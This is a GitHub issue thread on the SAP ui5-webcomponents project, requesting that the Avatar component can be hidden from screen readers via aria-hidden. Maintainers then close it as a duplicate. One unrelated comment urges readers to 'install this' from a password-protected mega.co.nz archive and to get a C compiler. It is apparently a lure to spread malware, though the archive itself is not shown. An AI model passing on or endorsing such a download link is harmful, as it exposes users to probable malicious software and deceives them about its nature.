### ISSUE TITLE
[Feature Request]:[SF][Avatar] Allow to be hidden from screen reader

### ISSUE THREAD

**Issue by 2bno1** [SAP/ui5-webcomponents#9912]
### Feature Request Description

In most case, avatar is non-meaningful to blind user. Per SF's A11y guideline, such non-meaningful content should be hidden from the screen reader.

### Proposed Solution

`aria-hidden` attribute can be set to the avatar shadow root element (https://github.com/SAP/ui5-webcomponents/blob/d8fff1a36555ac2ab8789f160c19e2d4dfb5f0d2/packages/main/src/Avatar.hbs#L1) via some way.

### Priority

None

### Privacy Policy

- [X] I’m not disclosing any internal or sensitive information.

**Comment by pinpolhoxx** [comment]
install this
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by IlianaB** [comment]
Hello @SAP/ui5-webcomponents-topic-p, take a look of this feature request about allowing the avatar to be hidden from screen reader.

Regards,
Iliana

**Comment by dobrinyonkov** [comment]
Closing as duplicate of https://github.com/SAP/ui5-webcomponents/issues/9912

**Comment by 2bno1** [comment]
> Closing as duplicate of #9912

@dobrinyonkov I see you close this ticket as duplicated tickets. Is there another ticket for tracking the same problem?
